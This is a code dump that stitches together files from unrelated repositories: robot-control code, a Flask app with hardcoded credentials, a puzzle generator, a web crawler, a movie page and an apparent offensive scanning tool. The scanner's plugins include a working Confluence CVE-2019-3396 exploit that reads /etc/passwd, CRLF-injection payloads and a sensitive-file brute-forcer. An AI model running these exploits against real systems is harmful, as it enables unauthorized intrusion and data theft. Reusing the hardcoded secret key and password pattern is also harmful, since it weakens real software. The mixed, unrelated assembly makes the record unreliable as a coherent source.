# Right joystick button 6 overrides encoder,
# button 7 resets encoder
self.winch_set(winch_signal)
# Feed arm controller raw values from the joystick
# Left joystick button 3 goes forward, 2 goes backward
arm_signal = self.joy.analog_arm()
self.arm_motor.set(self.arm_power.set(arm_signal * .3))
# Handle piston in and out
# Right joystick trigger button toggles claw in or out
if self.joy.digital_claw():
self.claw_toggle = True
elif self.claw_toggle:
self.claw_toggle = False
self.claw_state = not self.claw_state
self.set_claw()
# If the right joystick slider is down, also run test mode
if self.joy.digital_test():
self.test_mode()
def test_mode(self):
"""
# Test Mode
# calculates and prints values to be used in testing
"""
print('legalize crystal fucking weed')
print('winch revolutions: ', self.get_winch_revs())
print('angle: ', self.gyro.getAngle())
def RawDrive(self, x, y, rot):
xy = normalize_joystick_axes(x, y)
motor_values = get_wheel_magnitudes(xy, self.m)
# Deals with rotation and calming down the gyro
if rot != 0:
self.pidcontroller.reset()
if rot == 0 and self.last_rot != 0:
self.waiting_to_reenable = True
print("WAITING TO REENABLE")
elif self.waiting_to_reenable:
if self.last_angle == self.getAngle():
self.last_angle_count += 1
else:
self.last_angle_count = 0
if self.last_angle_count >= 10:
self.waiting_to_reenable = False
self.Enable()
print("REENABLING")
self.last_angle = self.getAngle()
self.last_rot = rot
for i, motor in enumerate(self.motors):
val = motor_values[i] * self.tweaks[i]
val += rot * .3
if val < 0:
val *= self.motor_bias
val += self.pid_correction
motor.set(val)
def pidWrite(self, output):
print("pid output: ", output)
self.pid_correction = output
def brake_rotation(self):
"""
Brakes robot if it's rotating
by powering the motors in the direction opposite the rotation
"""
gyro_rate = self.gyro.getRate()
return self.RawDrive(0, 0, -gyro_rate * .1)
def brake_linear(self):
"""
Brakes robot if it's moving forward or backward
by powering the motors in the direction opposite the movement
"""
accel_y = self.accel.getY()
return self.RawDrive(0, -accel_y * .1, 0)
def set_claw(self):
"""
# Moves claw into "claw_state" position
"""
self.solenoid1.set(not self.claw_state)
self.solenoid2.set(self.claw_state)
def claw_up(self):
"""
# Pushes claw out
"""
self.claw_state = False
def claw_down(self):
"""
# Pulls claw in
"""
self.claw_state = True
def winch_set(self, signal):
"""
Set winch controller safely by taking max and min encoder values
into account, unless you're pressing the override button
(right joystick, button 6)
signal=0 -> maintain winch position
signal>0 -> winch up?
signal<0 -> winch down?
"""
# Reset winch encoder value to 0 if right button 7 is pressed
if self.joy.digital_winch_encoder_reset():
self.winch_encoder.reset()
# Initializes "revs" to the winch encoder's current value
revs = self.get_winch_revs()
# Sets "winch_setpoint" when driver takes finger off winch button
if self.last_winch_signal != 0 and signal == 0:
self.winch_setpoint = revs
self.last_winch_signal = signal
# If no winch signal, maintain winch's height position
# Else moves winch according to winch signal
if signal == 0:
val = 0.1 - 0.01 * (revs - self.winch_setpoint)
else:
# Pressing right button 6 overrides winch's safety bounds
if not (self.joy.digital_winch_override()):
# Stop the winch if it is going out of bounds
if (((signal > 0.1 and revs >= self.winch_encoder_max()) or
(signal < -0.1 and revs <= self.winch_encoder_min()))):
signal = 0
val = 0.5 * signal
# Sets the winch motor's value
self.winch_motor.set(val) | {"/kiwidrive/kiwi.py": ["/kiwidrive/strategies.py"], "/kiwidrive/robot.py": ["/kiwidrive/kiwi.py"]} |
53,567 | wylliec/2015-recycle-rush | refs/heads/master | /kiwidrive/robot.py | import wpilib
import kiwidrive.kiwi as kiwi
class Robot(wpilib.IterativeRobot):
def robotInit(self):
self.joystick1 = wpilib.Joystick(0)
self.motor1 = wpilib.Talon(0)
self.motor2 = wpilib.Talon(1)
self.motor3 = wpilib.Talon(2)
self.kiwidrive = kiwi.KiwiDrive(
self.joystick1,
[self.motor1,
self.motor2,
self.motor3])
# Select which autonomous mode: "tote", "container", "tripletote"
self.auto_mode = "3-tote-straight"
def autonomousInit(self):
self.kiwidrive.autonomousInit(self.auto_mode)
def autonomousPeriodic(self):
self.kiwidrive.autonomousPeriodic()
def teleopInit(self):
self.kiwidrive.Enable()
def disabledInit(self):
self.kiwidrive.Disable()
def teleopPeriodic(self):
self.kiwidrive.Drive()
def testPeriodic(self):
pass
if __name__ == "__main__":
wpilib.run(Robot)
| {"/kiwidrive/kiwi.py": ["/kiwidrive/strategies.py"], "/kiwidrive/robot.py": ["/kiwidrive/kiwi.py"]} |
53,568 | wylliec/2015-recycle-rush | refs/heads/master | /runtests.py | import nose
if __name__ == '__main__':
nose.main(argv=['robot', '-s'])
| {"/kiwidrive/kiwi.py": ["/kiwidrive/strategies.py"], "/kiwidrive/robot.py": ["/kiwidrive/kiwi.py"]} |
53,569 | rolf-gutz/linguagemWebAula9 | refs/heads/master | /aplicacao.py | from flask import Flask
import sqlite3
#configuração
DATABASE ='banco.db'
DEBUG = True
SECRET_KEY = 'development key'
USERNAME = 'admin'
PASSWORD = 'default'
app = Flask(__name__) # Inicializando o modulo
def conectar_bd():
return sqlite3.connect(DATABASE)
| {"/controle.py": ["/aplicacao.py"]} |
53,570 | rolf-gutz/linguagemWebAula9 | refs/heads/master | /controle.py | from aplicacao import app
from flask import render_template
from flask import g
from aplicacao import conectar_bd
@app.before_request
def pre_requesicao():
g.db = conectar_bd()
@app.teardown_request
def encerrar_requisicao(exception):
g.db.close()
@app.route('/')
def index():
sql = '''select usuario,texto from mensagens order by id desc'''
cur = g.db.execute(sql)
mensagens = [dict(usuario = usuario , texto = texto)
for usuario, texto in cur.fetchall()]
context = {'titulo':'Página Principal',
'mensagens': mensagens
}
return render_template('index.html',**context)
@app.route('/mensagem')
def mensagem():
context = {'titulo':'Escrever mensagem'}
return render_template('mensagem.html',**context)
app.run(debug=True) | {"/controle.py": ["/aplicacao.py"]} |
53,599 | Ape/gamegenerator | refs/heads/master | /rules.py | from enum import Enum
Color = Enum("Color", "red green blue yellow")
def wire_colors():
return list(Color)
def victory(wires):
# You win the game when there are no red wires.
return all((x != Color.red for x in wires))
def actions():
return [
# Cut a red wire if the previous wire is green or if there is no
# previous wire, and if the next wire is blue or if there is no next
# wire.
lambda wires, cut: wires[cut] == Color.red \
and _prev(wires, cut) in [None, Color.green] \
and _first(wires, cut+1) in [None, Color.blue],
# Cut a red wire with exactly two wires before it if the first wire
# after is also red and the second wire after is not red.
lambda wires, cut: wires[cut] == Color.red \
and _num(wires[:cut]) == 2 \
and _first(wires, cut+1) == Color.red \
and _first(wires, cut+2) != Color.red,
# Cut a green wire if the next wire is yellow and there is an odd
# number of green wires.
lambda wires, cut: wires[cut] == Color.green \
and _first(wires, cut+1) == Color.yellow \
and _num_color(wires, Color.green) % 2 == 1,
# Cut a green wire if there is exactly one yellow wire and exactly one
# green wire.
lambda wires, cut: wires[cut] == Color.green \
and _num_color(wires, Color.green) == 1 \
and _num_color(wires, Color.yellow) == 1,
# Cut a green wire if the last wire is blue and there is an even number
# of green wires.
lambda wires, cut: wires[cut] == Color.green \
and _prev(wires, len(wires)) == Color.blue \
and _num_color(wires, Color.green) % 2 == 0,
# Cut a blue wire if there are exactly four wires.
lambda wires, cut: wires[cut] == Color.blue \
and _num(wires) == 4,
# Cut a blue wire if there are as many red wires as there are blue and
# yellow wires combined.
lambda wires, cut: wires[cut] == Color.blue \
and (_num_color(wires, Color.blue)
+ _num_color(wires, Color.yellow)
== _num_color(wires, Color.red)),
# Cut a yellow wire if the first wire is green and there is an even
# number of yellow wires.
lambda wires, cut: wires[cut] == Color.yellow \
and _first(wires, 0) == Color.green \
and _num_color(wires, Color.yellow) % 2 == 0,
# Cut a yellow wire if the first wire is blue and there is an odd
# number of yellow wires.
lambda wires, cut: wires[cut] == Color.yellow \
and _first(wires, 0) == Color.blue \
and _num_color(wires, Color.yellow) % 2 == 1,
# Cut a yellow wire if the next wire is red and the previous wire is
# not yellow.
lambda wires, cut: wires[cut] == Color.yellow \
and _prev(wires, cut) != Color.yellow \
and _first(wires, cut+1) == Color.red,
# Cut any wire that is not red or green if it is between two green
# wires with no other colors in between.
lambda wires, cut: not wires[cut] in [Color.red, Color.green] \
and _prev(wires, cut) == Color.green \
and _first(wires, cut+1) == Color.green,
]
def _num(wires):
return sum((1 for x in wires if x != None))
def _num_color(wires, color):
return sum((1 for x in wires if x == color))
def _first(wires, index):
try:
return next((x for x in wires[index:] if x != None))
except StopIteration:
return None
def _prev(wires, index):
try:
return next((x for x in reversed(wires[:index]) if x != None))
except StopIteration:
return None
| {"/main.py": ["/rules.py"]} |
53,600 | Ape/gamegenerator | refs/heads/master | /main.py | #!/usr/bin/env python3
import enum
import itertools
import multiprocessing
import random
import time
import rules
NUM_WIRES = 8
MIN_CUTS = 6
MAX_CUTS = 7
THREADS = 4
PROGRESS_INTERVAL = 10 # seconds
NonSolution = enum.Enum("NonSolution", "too_easy not_possible")
def generate_games(colors):
# Start with a cartesian product
games = itertools.product(colors, repeat=NUM_WIRES)
# Filter out games that don't use all colors
games = [x for x in games if set(colors) == set(x)]
# Randomize the order
random.shuffle(games)
return (games, len(games))
def solve(game):
for num_cuts in range(MAX_CUTS + 1):
for cuts in itertools.permutations(range(NUM_WIRES), num_cuts):
if is_solution(game, cuts):
if num_cuts >= MIN_CUTS:
return (game, cuts)
else:
return (game, NonSolution.too_easy)
else:
return (game, NonSolution.not_possible)
def is_solution(game, cuts):
wires = list(game)
for cut in cuts:
if rules.victory(wires):
# No extra cuts after victory allowed
return False
if all((not x(wires, cut) for x in rules.actions())):
# There must be an action rule for the cut
return False
wires[cut] = None
return rules.victory(wires)
def solve_interruptable(game):
try:
return solve(game)
except KeyboardInterrupt:
pass
def print_game(game, solution):
print()
print_wires(game)
print("Solution: {}".format(" ".join(map(str, solution))))
def print_wires(wires):
for i, wire in enumerate(wires):
print("{}: {}".format(i, wire.name))
def rate(games, start_time):
value = games / (time.time() - start_time)
return "{:.2f} games per second".format(value)
def print_stats(games, accepted, too_easy):
impossible = games - accepted - too_easy
print_stat("accepted", accepted, games)
print_stat("too easy", too_easy, games)
print_stat("impossible", impossible, games)
def print_stat(label, number, games):
print("- {} games {} ({:.2f} %)"
.format(number, label, 100 * number / games))
def list_games(pool):
print("Generating game configurations...")
games, num_games = generate_games(rules.wire_colors())
print("Searching for acceptable games from {} configurations..."
.format(num_games))
accepted = 0
too_easy = 0
start_time = time.time()
progress_time = time.time()
solutions = pool.imap_unordered(solve_interruptable, games)
for i, (game, solution) in enumerate(solutions):
if solution in NonSolution:
if solution == NonSolution.too_easy:
too_easy += 1
else:
accepted += 1
print_game(game, solution)
if time.time() - progress_time > PROGRESS_INTERVAL:
progress_time = time.time()
print()
print("Progress: {:.1f} % at {}"
.format(100 * i / num_games, rate(i, start_time)))
print_stats(i, accepted, too_easy)
print()
print("Checked {} games at {}"
.format(num_games, rate(num_games, start_time)))
print_stats(num_games, accepted, too_easy)
if __name__ == "__main__":
with multiprocessing.Pool(THREADS) as pool:
try:
list_games(pool)
except KeyboardInterrupt:
print()
print("Aborting...")
pool.terminate()
| {"/main.py": ["/rules.py"]} |
53,677 | AnshShrivastava/SPY_WEB | refs/heads/master | /general.py | import os
def create_project_dir(directory):
if not os.path.exists(directory):
print('Creating Project ' + directory)
os.makedirs(directory)
#create quere and crawled files
def create_data_files(project_name, base_url):
queue = project_name + '/queue.txt'
crawled = project_name +'/crawled.txt'
if not os.path.isfile(queue):
write_file(queue, base_url)
if not os.path.isfile(crawled):
write_file(crawled, '')
#Create a new file
def write_file(path, data):
with open(path, 'w') as f:
f.write(data)
#f.close()
#Add data onto an existing file
def append_file(path, data):
with open(path, 'a') as file:
file.write(data + '\n')
# Clean file
def clear_file(path):
with open(path, 'w'):
pass
# Read File and Convert into Set Items
def file_to_set(file_name):
results = set()
with open(file_name, 'rt') as f:
for line in f:
results.add(line.replace('\n', ''))
return results
# Iterate through a set, each item will be new line in file
def set_to_file(links, file_name):
with open(file_name, "w") as f:
for l in sorted(links):
f.write(l + "\n")
| {"/main.py": ["/general.py"]} |
53,678 | AnshShrivastava/SPY_WEB | refs/heads/master | /main.py | import threading
from queue import Queue
from spider import Spider
from domain import *
from general import *
print("####################################################\n")
print(" Python-based Web Crawler \n")
print("####################################################\n")
print("\n")
HOMEPAGE = input("Enter URL to crawl: ")
PROJECT_NAME = 'SPY_WEB'
DOMAIN_NAME = get_domain_name(HOMEPAGE)
QUEUE_FILE = PROJECT_NAME + '/queue.txt'
CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
NUMBER_OF_THREADS = 2
queue = Queue()
Spider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)
# Create Threads
def create_spiders():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
#Do the next job in queue
def work():
while True:
url = queue.get()
Spider.crawl_page(threading.current_thread().name, url)
queue.task_done()
# Each link is new job
def create_job():
for link in file_to_set(QUEUE_FILE):
queue.put(link)
queue.join()
crawl()
#Check for items and if found, crawl
def crawl():
queued_links = file_to_set(QUEUE_FILE)
if len(queued_links)>0:
print(str(len(queued_links))+ " links in the queue")
create_job()
create_spiders()
crawl()
| {"/main.py": ["/general.py"]} |
53,690 | jesseliy/MachineLearning-P2 | refs/heads/master | /media.py | import webbrowser
class Movie():
"""Class describe the main info of movie
The __init__ method may be documented in either the class level
docstring, or as a docstring on the __init__ method itself.
Either form is acceptable, but the two should not be mixed. Choose one
convention to document the __init__ method and be consistent with it.
Note:
Do not include the `self` parameter in the ``Args`` section.
Args:
movie_title (str): movie's title.
movie_storyline (str): movie's storyline.
poster_image (str): poster image's url.
trailer_youtube (str): trailer's url
Attributes:
movie_title (str): movie's title.
movie_storyline (str): movie's storyline.
poster_image (str): poster image's url.
trailer_youtube (str): trailer's url
Methods:
show_trailer(): Open trailer in webbrower
"""
def __init__(self, movie_title, movie_storyline,
poster_image, trailer_youtube):
self.title = movie_title
self.storyline = movie_storyline
self.poster_image_url = poster_image
self.trailer_url = trailer_youtube
# Open trailer in webbrower
def show_trailer(self):
webbrowser.open(self.trailer_yotube_url)
| {"/enterainment_center.py": ["/media.py"]} |
53,691 | jesseliy/MachineLearning-P2 | refs/heads/master | /enterainment_center.py | import media
import fresh_tomatoes # A library for creating the web-page
# function definition:
# media.Movie(title,storyline,poster_image,trailer_youtube)
The_Shawshank_Redemption = media.Movie(
"The Shawshank Redemption",
"Two imprisoned men bond over a number of years, "
"finding solace and eventual redemption through "
"acts of common decency.",
"https://www.goldenglobes.com/sites/default/"
"files/films/the-shawshank-redemption.jpg",
"https://www.youtube.com/watch?v=6hB3S9bIaco")
The_GodFather = media.Movie(
"The Godfather",
"The aging patriarch of an organized crime dynasty transfers "
"control of his clandestine empire to his reluctant son.",
"http://img.zanda.com/item/57040290000061/1024x768/"
"The_Godfather.jpg",
"https://www.youtube.com/watch?v=sY1S34973zA")
Coco = media.Movie(
"Coco",
"A story of a boy enters the land of the dead to fine his great-gre"
"at-grandfather, legendary singer.",
"https://upload.wikimedia.org/wikipedia/en/9/98/"
"Coco_%282017_film%29_poster.jpg",
"https://www.youtube.com/watch?v=zNCz4mQzfEI")
""" you can add you favorite movies here
"""
# Creat the movie list for movie page
movies = [The_Shawshank_Redemption, The_GodFather, Coco]
# Creat the movie page
fresh_tomatoes.open_movies_page(movies)
| {"/enterainment_center.py": ["/media.py"]} |
53,693 | alex14324/Eagel | refs/heads/main | /plugins/files.py | from utils.status import *
from .helper import Plugin,utils
from urllib.parse import urlparse
import threading
import utils.multitask as multitask
class SensitiveFiles(Plugin):
def __init__(self):
self.name = "Sensitive Files"
self.enable = True
self.description = ""
self.concurrent = 12
self.__files = [line.strip() for line in open(sys.path[0]+"/plugins/files/senstivefiles.txt").readlines() if line.strip()]
self.__lock = threading.Lock()
self.__cache = {}
self.__found = {}
def presquites(self, host):
if utils.isalive( utils.uri(host) ):
return True
return False
def check(self,host,path):
base_len = self.__cache[host]['base']
dummy_len = self.__cache[host]['dummy']
full = utils.uri(host) + path
request = utils.requests.get(full, verify=False)
if request.status_code != 200 or len(request.text.split("\n")) in [base_len, dummy_len] or not host in urlparse(request.url).hostname:
return
with self.__lock:
self.__found[host].append(full)
def main(self,host):
if not host in self.__cache.keys():
self.__found.update({host: []})
self.__cache.update({host:{
'base' : len( utils.requests.get(utils.uri(host), verify=False).text.split("\n") ),
'dummy': len( utils.requests.get(utils.uri(host) + "nofoundfile12345", verify=False ).text.split("\n") )
}})
channel = multitask.Channel(self.name)
multitask.workers(self.check,channel,self.concurrent)
for path in self.__files:
channel.append(host,path)
channel.wait()
channel.close()
if self.__found[host]:
return Result(
status = SUCCESS,
msg = self.__found[host],
request = None,
response = None
)
return Result(FAILED,None,None,None)
| {"/plugins/files.py": ["/utils/status.py", "/plugins/helper.py", "/utils/multitask.py"], "/plugins/cve-2019-3396.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/crlf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spider.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py", "/utils/multitask.py"], "/plugins/cve-2019-5418.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/ftp.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py"], "/main.py": ["/utils/db.py", "/utils/status.py", "/utils/multitask.py", "/utils/console.py", "/utils/data.py", "/plugins/__init__.py"], "/plugins/traversal.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2018-11776.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-2725.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-8451.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/firebase.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/s3.py": ["/utils/decorators.py", "/plugins/helper.py", "/utils/status.py"], "/plugins/plugin.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/subtakeover.py": ["/utils/status.py", "/plugins/helper.py"], "/scripts/ping.py": ["/utils/status.py", "/utils/console.py", "/utils/multitask.py"], "/plugins/sumggler.py": ["/plugins/helper.py", "/utils/status.py", "/utils/multitask.py", "/utils/data.py"], "/utils/urls.py": ["/utils/wrappers.py", "/utils/decorators.py"], "/utils/console.py": ["/utils/status.py"], "/plugins/cve-2012-1823.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/__init__.py": ["/plugins/helper.py"], "/plugins/cve-2019-10098.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2014-6271.py": ["/utils/status.py", "/plugins/helper.py"]} |
53,694 | alex14324/Eagel | refs/heads/main | /plugins/cve-2019-3396.py | from utils.status import *
from .helper import Plugin,utils
class CVE_2019_3396(Plugin):
def __init__(self):
self.name = "Confluence LFI - CVE_2019_3396"
self.enable = True
self.description = ""
def presquites(self, host):
if utils.isalive( utils.uri(host) ):
return True
return False
def main(self,host):
data = '{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.google.com","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}'
request = utils.requests.post(utils.uri(host) + "/rest/tinymce/1/macro/preview", data=data, headers={
"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Referer" : utils.uri(host) + "/pages/resumedraft.action?draftId=1&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
"Content-Type" : "application/json; charset=utf-8",
'X-Atlassian-Token' : 'no-check'
})
if request.status_code == 200 and 'root:x:0:0:root' in request.text:
return Result(
status = SUCCESS,
msg = "PWNED",
request = utils.dump_request(request),
response = utils.dump_response(request)
)
return Result(FAILED,None,None,None) | {"/plugins/files.py": ["/utils/status.py", "/plugins/helper.py", "/utils/multitask.py"], "/plugins/cve-2019-3396.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/crlf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spider.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py", "/utils/multitask.py"], "/plugins/cve-2019-5418.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/ftp.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py"], "/main.py": ["/utils/db.py", "/utils/status.py", "/utils/multitask.py", "/utils/console.py", "/utils/data.py", "/plugins/__init__.py"], "/plugins/traversal.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2018-11776.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-2725.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-8451.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/firebase.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/s3.py": ["/utils/decorators.py", "/plugins/helper.py", "/utils/status.py"], "/plugins/plugin.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/subtakeover.py": ["/utils/status.py", "/plugins/helper.py"], "/scripts/ping.py": ["/utils/status.py", "/utils/console.py", "/utils/multitask.py"], "/plugins/sumggler.py": ["/plugins/helper.py", "/utils/status.py", "/utils/multitask.py", "/utils/data.py"], "/utils/urls.py": ["/utils/wrappers.py", "/utils/decorators.py"], "/utils/console.py": ["/utils/status.py"], "/plugins/cve-2012-1823.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/__init__.py": ["/plugins/helper.py"], "/plugins/cve-2019-10098.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2014-6271.py": ["/utils/status.py", "/plugins/helper.py"]} |
53,695 | alex14324/Eagel | refs/heads/main | /plugins/crlf.py | from utils.status import *
from .helper import Plugin,utils
class CRLF(Plugin):
def __init__(self):
self.name = "CRLF Scanner"
self.enable = True
self.description = ""
def presquites(self, host):
if utils.isalive( utils.uri(host) ):
return True
return False
def main(self,host):
for payload in ["%0D%0A", "%E5%98%8A","%E5%98%8D"]:
for scheme in utils.urlschemes(host):
poc = scheme + "://" + host + "/" + payload + "header:crlf"
request = utils.requests.get(poc)
for _, value in list(request.headers.items()):
if value == "crlf":
return Result(
status = SUCCESS,
msg = poc,
request = utils.dump_request(request),
response = utils.dump_response(request)
)
if request.history:
for history in request.history:
for _, value in list(history.headers.items()):
if value == "crlf":
return Result(
status = SUCCESS,
msg = poc,
request = utils.dump_request(request),
response = utils.dump_response(request)
)
return Result(FAILED,None,utils.dump_request(request),utils.dump_response(request)) | {"/plugins/files.py": ["/utils/status.py", "/plugins/helper.py", "/utils/multitask.py"], "/plugins/cve-2019-3396.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/crlf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spider.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py", "/utils/multitask.py"], "/plugins/cve-2019-5418.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/ftp.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py"], "/main.py": ["/utils/db.py", "/utils/status.py", "/utils/multitask.py", "/utils/console.py", "/utils/data.py", "/plugins/__init__.py"], "/plugins/traversal.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2018-11776.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-2725.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-8451.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/firebase.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/s3.py": ["/utils/decorators.py", "/plugins/helper.py", "/utils/status.py"], "/plugins/plugin.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/subtakeover.py": ["/utils/status.py", "/plugins/helper.py"], "/scripts/ping.py": ["/utils/status.py", "/utils/console.py", "/utils/multitask.py"], "/plugins/sumggler.py": ["/plugins/helper.py", "/utils/status.py", "/utils/multitask.py", "/utils/data.py"], "/utils/urls.py": ["/utils/wrappers.py", "/utils/decorators.py"], "/utils/console.py": ["/utils/status.py"], "/plugins/cve-2012-1823.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/__init__.py": ["/plugins/helper.py"], "/plugins/cve-2019-10098.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2014-6271.py": ["/utils/status.py", "/plugins/helper.py"]} |
53,696 | alex14324/Eagel | refs/heads/main | /utils/multitask.py | from collections import namedtuple
import threading
import time
import signal
import sys
import types
import sys
class Channel(object):
def __init__(self,name='default'):
self.name = name
self.stop = False
self.items = []
self.jobs = 0
self.__lock = threading.Lock()
def append(self,*items):
with self.__lock: self.jobs += 1
self.items.append(items)
def pop(self):
try:
return True, self.items.pop(0)
except IndexError:
return False, None
def open(self):
return not self.stop
def wait(self):
while self.jobs > 0:
time.sleep(0.25)
def close(self):
self.stop = True
result = namedtuple("Result","func ret args channel wid")
def _worker(wid,target,channel,lock,callback=None):
while( channel.open() ):
ok, args = channel.pop()
if not ok: time.sleep(0.50); continue
try:
retval = target(*args)
except Exception as e :
#print(str(e))
retval = None
with lock: channel.jobs -= 1
if type(callback) != types.FunctionType and type(callback) != types.MethodType:
continue
callback(
result(wid=wid,channel=channel,func=target,args=args,ret=retval)
)
def workers(target,channel,count=5,callback=None):
lock = threading.Lock()
for _id in range(1,count+1):
threading.Thread(target=_worker,args=(_id,target,channel,lock,callback,)).start()
| {"/plugins/files.py": ["/utils/status.py", "/plugins/helper.py", "/utils/multitask.py"], "/plugins/cve-2019-3396.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/crlf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spider.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py", "/utils/multitask.py"], "/plugins/cve-2019-5418.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/ftp.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py"], "/main.py": ["/utils/db.py", "/utils/status.py", "/utils/multitask.py", "/utils/console.py", "/utils/data.py", "/plugins/__init__.py"], "/plugins/traversal.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2018-11776.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-2725.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-8451.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/firebase.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/s3.py": ["/utils/decorators.py", "/plugins/helper.py", "/utils/status.py"], "/plugins/plugin.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/subtakeover.py": ["/utils/status.py", "/plugins/helper.py"], "/scripts/ping.py": ["/utils/status.py", "/utils/console.py", "/utils/multitask.py"], "/plugins/sumggler.py": ["/plugins/helper.py", "/utils/status.py", "/utils/multitask.py", "/utils/data.py"], "/utils/urls.py": ["/utils/wrappers.py", "/utils/decorators.py"], "/utils/console.py": ["/utils/status.py"], "/plugins/cve-2012-1823.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/__init__.py": ["/plugins/helper.py"], "/plugins/cve-2019-10098.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2014-6271.py": ["/utils/status.py", "/plugins/helper.py"]} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.